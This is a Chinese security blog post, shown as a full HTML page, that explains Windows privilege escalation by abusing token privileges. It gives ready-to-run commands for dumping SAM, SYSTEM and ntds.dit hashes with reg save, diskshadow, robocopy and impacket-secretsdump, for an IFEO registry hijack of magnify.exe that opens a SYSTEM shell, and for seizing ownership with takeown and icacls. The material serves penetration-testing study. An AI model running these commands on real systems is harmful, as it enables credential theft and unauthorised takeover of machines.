<!DOCTYPE html><html lang="zh-CN" id="theme-light-mode"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="zIxyd"><title>Windows 特权提升 · zIxyd's Blog</title><meta name="description" content="前言记录本人在 Windows 环境中遇到过的特权提权方法。
SeImpersonatePrivilege通常服务账户（如 LOCAL SERVICE、NETWORK SERVICE）都拥有此特权，也是最常用的提权方式之一。 可以通过诱导 Windows 服务（如 DCOM）执行 NTLM 身份验证"><meta name="keywords" content="Blog,博客,Hexo"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="shortcut icon" type="image/x-icon" href="/images/logo.png"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="stylesheet" href="/css/insight.css"><link rel="stylesheet" href="/css/search.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="page-top animated fadeInDown"><div class="nav"><li> <a href="/">Home</a></li><li> <a href="/archives">Archives</a></li><li> <a href="/tags">Tags</a></li><li> <a href="/about">About</a></li></div><div class="information"><div class="nav_right_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li><li><a class="fa fa-search" onclick="openWindow();"></a></li><li><a class="fa fa-sun-o" onclick="darkLightToggle();"></a></li></div><div class="avatar"></div></div></div><div class="toc-container in-page animated fadeInDown"><details class="ltr toc-toggle"><summary>Menu</summary><div class="tocmenu"><ol class="toclist"><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#%E5%89%8D%E8%A8%80"><span class="toclist-text">前言</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeImpersonatePrivilege"><span class="toclist-text">SeImpersonatePrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeBackupPrivilege"><span class="toclist-text">SeBackupPrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeRestorePrivilege"><span class="toclist-text">SeRestorePrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeTakeOwnershipPrivilege"><span class="toclist-text">SeTakeOwnershipPrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeManageVolumePrivilege"><span class="toclist-text">SeManageVolumePrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#%E5%90%8E%E7%BB%AD"><span class="toclist-text">后续</span></a></li></ol></div></details></div><div class="sidebar animated fadeInDown"><div class="sidebar-top"><div class="logo-title"><div class="title"><img src="/images/logo.png" style="width:220px;" alt="favicon"><h3 title=""><a href="/">zIxyd's Blog</a></h3><div class="description"><p>存放个人学习笔记的小窝，欢迎交流</p></div></div><ul class="social-links"><li><a target="_blank" rel="noopener" href="https://github.com/zIxyd"><i class="fa fa-github"></i></a></li><li><a href="mailto:2972914692@qq.comm"><i class="fa fa-envelope"></i></a></li><li><a target="_blank" rel="noopener" href="https://res.abeim.cn/api-qq?qq=2972914692"><i class="fa fa-qq"></i></a></li></ul></div><div class="toc-container in-sidebar"><details class="ltr" open><summary>Menu</summary><div class="tocmenu"><ol class="toclist"><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#%E5%89%8D%E8%A8%80"><span class="toclist-text">前言</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeImpersonatePrivilege"><span class="toclist-text">SeImpersonatePrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeBackupPrivilege"><span class="toclist-text">SeBackupPrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeRestorePrivilege"><span class="toclist-text">SeRestorePrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeTakeOwnershipPrivilege"><span class="toclist-text">SeTakeOwnershipPrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#SeManageVolumePrivilege"><span class="toclist-text">SeManageVolumePrivilege</span></a></li><li class="toclist-item toclist-level-2"><a class="toclist-link" href="#%E5%90%8E%E7%BB%AD"><span class="toclist-text">后续</span></a></li></ol></div></details></div></div><div class="footer"><div class="p"> <span> 全站CC-BY-SA-3.0 </span><i class="fa fa-star"></i><span> zIxyd</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><a href="https://github.com/Lhcfl/hexo-theme-anatolo" target="_blank">Anatolo </a></div><div class="beian"></div></div></div><div class="main"><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>Windows 特权提升</a></h3></div><div class="post-content"><p><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>记录本人在 Windows 环境中遇到过的特权提权方法。</p>
<h2 id="SeImpersonatePrivilege"><a href="#SeImpersonatePrivilege" class="headerlink" title="SeImpersonatePrivilege"></a>SeImpersonatePrivilege</h2><p>通常服务账户（如 <code>LOCAL SERVICE</code>、<code>NETWORK SERVICE</code>）都拥有此特权，也是最常用的提权方式之一。<br> 可以通过诱导 Windows 服务（如 DCOM）执行 NTLM 身份验证，获取特权令牌，从而以 SYSTEM 权限执行进程。</p>
<ul>
<li>实用工具 👉 <a target="_blank" rel="noopener" href="https://github.com/BeichenDream/GodPotato">GodPotato</a></li>
</ul>
<p>示例：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/20250717145635.png"></p>
<p><strong>注意</strong>:在一些特殊情况下，<code>LOCAL SERVICE</code> 或 <code>NETWORK SERVICE</code> 可能会受到限制而没有 <code>SeImpersonatePrivilege</code>，可以用 <a target="_blank" rel="noopener" href="https://github.com/itm4n/FullPowers">FullPowers</a> 恢复：<a target="_blank" rel="noopener" href="https://itm4n.github.io/localservice-privileges/#reproducing-the-conditions-of-the-exploit">reproducing-the-conditions-of-the-exploit</a></p>
<h2 id="SeBackupPrivilege"><a href="#SeBackupPrivilege" class="headerlink" title="SeBackupPrivilege"></a>SeBackupPrivilege</h2><p>拥有该特权的进程可对任何文件&#x2F;对象进行<strong>无视 ACL 的读访问</strong>，常见于 <code>Backup Operators</code> 组。</p>
<p>典型利用：</p>
<ul>
<li>窃取 <code>SAM</code>、<code>SYSTEM</code>、<code>NTDS.dit</code>，解密获得 NTLM 哈希。</li>
</ul>
<p>工作组环境下利用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SAM SAM</span><br><span class="line">reg save HKLM\SYSTEM SYSTEM</span><br><span class="line"></span><br><span class="line">impacket-secretsdump -sam ./SAM -system ./SYSTEM local</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/20250717150350.png"></p>
<p>域环境中：</p>
<p>需要注意的是，域控制器和 Windows 计算机之间的漏洞利用方法存在差异。。这是因为，对于 DC，该权限仅允许您进行备份，而不能进行复制。在独立系统中，我们可以复制</p>
<p>在域控制器中，我们需要 ntds.dit 文件来提取哈希值以及SYSTEM；ntds.dit 文件的问题在于，当目标机器正在运行时，该文件始终处于使用状态，并且我们非常清楚，当文件未充分使用时，就不可能使用任何方式复制该文件。常规方法。为了避免这个问题，我们需要使用diskshadow功能。这是Windows的内置功能，可以帮助我们创建当前正在使用的驱动器的副本。</p>
<p>有一些使用 diskshadow 的方法，其中包括在 diskshadow shell 中提供指令，但这往往有点棘手。因此，我们将创建一个分布式 Shell 文件或 dsh 文件，其中包含 diskshadow 运行所需的所有命令，并创建 Windows 驱动器的完整副本，然后我们可以使用它来提取 ntds.dit 文件从。</p>
<p>接下来通过windows自带的”diskshadow”工具和”robocopy”工具拿到 ntds.dit文件；</p>
<p>将下面的内容保存至 script.txt文件;这些内容是diskshadow的操作指令，具体作用就是将C盘备份一份到E盘</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">set metadata C:\Windows\Temp\meta.cab</span><br><span class="line">set context clientaccessible</span><br><span class="line">set context persistent</span><br><span class="line">begin backup</span><br><span class="line">add volume C: alias cdrive</span><br><span class="line">create</span><br><span class="line">expose %cdrive% E:</span><br><span class="line">end backup</span><br></pre></td></tr></table></figure>

<p>运行”diskshadow ”;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diskshadow /s script.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/image.png"></p>
<p><strong>robocopy</strong>: 这是一个强大的文件复制命令行工具；**&#x2F;b**: 表示以备份模式运行；</p>
<p>将”E:\Windows\ntds\ntds.dit“文件复制到当前目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">robocopy /b E:\Windows\ntds . ntds.dit</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/image2.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我们现在拥有 ntds.dit 文件，我们需要提取SYSTEM。这可以通过简单的 reg save 命令来完成，</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SYSTEM .\SYSTEM</span><br><span class="line"></span><br><span class="line">impacket-secretsdump  -system SYSTEM  -ntds ntds.dit local</span><br></pre></td></tr></table></figure>



<h2 id="SeRestorePrivilege"><a href="#SeRestorePrivilege" class="headerlink" title="SeRestorePrivilege"></a>SeRestorePrivilege</h2><p>允许对任何文件&#x2F;对象执行写访问，常用手法是 <strong>IFEO（Image File Execution Options）映像劫持</strong>：</p>
<p>Image File Execution Options 简单的说，通过修改指定注册表项实现程序的劫持，即运行指定程序实际上运行的是我们自己的后门程序；一个程序要被运行时，会先检查注册表，如果有指定程序并且开启了debugger，那么会优先执行debugger指定的程序，这样也就造成了映像劫持。</p>
<p>如下图所示：“magnify.exe”本来是放大镜的执行文件，我们在其注册表中添加一个”REG_SZ”，“Debugger”指向cmd.exe;</p>
<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/aa.png"></p>
<p>当我们在登陆页面点击放大镜，就会以”system”用户的权限运行一个”cmd.exe”</p>
<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/imageasdfa.png"></p>
<p>如下图所示：</p>
<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/image8.png"></p>
<p>可以直接通过reg命令设置映像劫持。这是因为在reg命令内部会自动调用AdjustTokenPrivileges()函数为当前进程开启 SeRestorePrivilege 特权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe&quot; /v Debugger /t REG_SZ /d &quot;C:\Windows\System32\cmd.exe&quot;</span><br></pre></td></tr></table></figure>

<p>因为可以在任意目录写文件，这意味着还可以劫持dll来提升权限，一篇不错的文章，感兴趣的可以自己看，推荐 👉 <a target="_blank" rel="noopener" href="https://juggernaut-sec.com/dll-hijacking/#Two_Practical_Examples_of_Phantom_DLL_Hijacking">Phantom DLL Hijacking</a></p>
<h2 id="SeTakeOwnershipPrivilege"><a href="#SeTakeOwnershipPrivilege" class="headerlink" title="SeTakeOwnershipPrivilege"></a>SeTakeOwnershipPrivilege</h2><p>SeTakeOwnershipPrivilege 特权在攻击面上类似于 SeRestorePrivilege，由于可以接管任意对象，因此可以修改对象的 ACL。我们通过修改 Image File Execution Options 注册表或系统资源的 DACL，使我们拥有完全控制权限，并通过映像劫持、DLL 劫持或劫持服务等方法来获得本地特权提升</p>
<p><strong>SeTakeOwnershipPrivilege</strong> 允许您更改文件或文件夹的所有权，使您能够修改或访问受限文件。获得所有权后，您可以更改其<strong>自主访问控制列表 (DACL)</strong> ，以授予自己完全控制权。</p>
<p>使用 <code>takeown</code> 命令来获取文件或目录的所有权(我用hosts文件举例)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">takeown /F C:\Windows\System32\drivers\etc\hosts</span><br></pre></td></tr></table></figure>

<p>此命令将指定文件的所有权更改为你的用户帐户。</p>
<p>取得所有权后，使用 <code>icacls</code> 命令修改文件的权限，以获得完全控制权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">icacls C:\Windows\System32\drivers\etc\hosts /grant &lt;username&gt;:F</span><br></pre></td></tr></table></figure>

<p>授予自己完全控制权后，就有权限修改文件了；</p>
<p>还可以使用 <strong>SeTakeOwnershipPrivilege</strong> 修改关键注册表项的所有权和权限，可以修改”image file exectuion options”的所有者，来镜像劫持；</p>
<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/image9.png"></p>
<h2 id="SeManageVolumePrivilege"><a href="#SeManageVolumePrivilege" class="headerlink" title="SeManageVolumePrivilege"></a>SeManageVolumePrivilege</h2><p>此特权可以授予计算机上所有用户对 “C:\” 驱动器的完全权限，利用：<a target="_blank" rel="noopener" href="https://github.com/CsEnox/SeManageVolumeExploit">https://github.com/CsEnox/SeManageVolumeExploit</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/zIxyd/image@main/ctfshow/20250717155510.png"></p>
<p>所有用户都可以对”c:\“目录文件有完全控制权限，下一步可以进行DLL劫持；</p>
<h2 id="后续"><a href="#后续" class="headerlink" title="后续"></a>后续</h2><p>还有其他可用于提权的特权 👉 <a target="_blank" rel="noopener" href="https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#setcbprivilege">privilege-escalation-abusing-tokens</a></p>
<p>后续遇到再记录 😀</p>
</p></div><div class="post-footer"><div class="tip">All rights reserved<br>Author: zIxyd</div><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2025-07-20</span><span class="leancloud_visitors"></span><span>About 1528 words, 5 min 5 sec  read</span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/intent/tweet?text=I%20have%20found%20a%20great%20blog.%0A%0AzIxyd's%20Blog%20%C2%B7%20Windows%20%E7%89%B9%E6%9D%83%E6%8F%90%E5%8D%87%0Ahttps://zIxyd.github.io/2025/07/20/windows%20%E7%89%B9%E6%9D%83%E6%8F%90%E5%8D%87/%0A"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2025/07/21/DPAPI%20secrets/" title="DPAPI secrets">Previous</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2025/07/16/%E6%BB%A5%E7%94%A8%20AV%20EDR%20%E7%9A%84%E6%8E%92%E9%99%A4%E6%9C%BA%E5%88%B6%E6%9D%A5%E7%BB%95%E8%BF%87%E6%A3%80%E6%B5%8B/" title="滥用AV/EDR的排除机制来绕过检测">Next</a></li></ul></div><script src="/js/visitors.js"></script></div></div></div></div><script src="/js/darkLightToggle.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script>(function(window){var INSIGHT_CONFIG={TRANSLATION:{POSTS:"Posts",PAGES:"Pages",CATEGORIES:"Categories",TAGS:"Tags",UNTITLED:"(Untitled)",},CONTENT_URL:"/content.json",};window.INSIGHT_CONFIG=INSIGHT_CONFIG})(window);</script><script src="/js/insight.js" defer></script><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Search..."><span class="searchbox-close"><a class="fa fa-times-circle" onclick="closeWindow();"></a></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"><p>Seraching...</p></div></div></div></div></body></html>